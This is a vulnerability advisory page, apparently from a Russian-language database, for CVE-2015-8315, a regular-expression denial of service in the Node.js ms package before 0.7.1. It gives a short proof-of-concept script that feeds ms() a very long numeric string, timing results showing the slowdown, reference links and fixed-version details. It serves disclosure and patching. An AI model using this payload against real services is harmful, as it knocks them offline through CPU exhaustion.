Описание
Regular Expression Denial of Service in ms
Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.
Proof of Concept
var ms = require('ms');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
ms(genstr(process.argv[2], "5") + " minutea");
Results
Showing increase in execution time based on the input string.
$ time node ms.js 10000
real 0m0.758s
user 0m0.724s
sys 0m0.031s
$ time node ms.js 20000
real 0m2.580s
user 0m2.494s
sys 0m0.047s
$ time node ms.js 30000
real 0m5.747s
user 0m5.483s
sys 0m0.080s
$ time node ms.js 80000
real 0m41.022s
user 0m38.894s
sys 0m0.529s
Ссылки
- https://nvd.nist.gov/vuln/detail/CVE-2015-8315
- https://github.com/unshiftio/millisecond
- https://nodesecurity.io/advisories/46
- https://support.f5.com/csp/article/K46337613?utm_source=f5support&%3Butm_medium=RSS
- https://support.f5.com/csp/article/K46337613?utm_source=f5support&utm_medium=RSS
- https://web.archive.org/web/20200227190911/http://www.securityfocus.com/bid/96389
- http://www.openwall.com/lists/oss-security/2016/04/20/11
- http://www.securityfocus.com/bid/96389
Пакеты
Наименование
ms
npm
Затронутые версииВерсия исправления
< 0.7.1
0.7.1
Связанные уязвимости
redhat
больше 10 лет назад
The ms package before 0.7.1 for Node.js allows attackers to cause a denial of service (CPU consumption) via a long version string, aka a "regular expression denial of service (ReDoS)."
CVSS3: 7.5
nvd
около 9 лет назад
The ms package before 0.7.1 for Node.js allows attackers to cause a denial of service (CPU consumption) via a long version string, aka a "regular expression denial of service (ReDoS)."
CVSS3: 7.5
debian
около 9 лет назад
The ms package before 0.7.1 for Node.js allows attackers to cause a de ...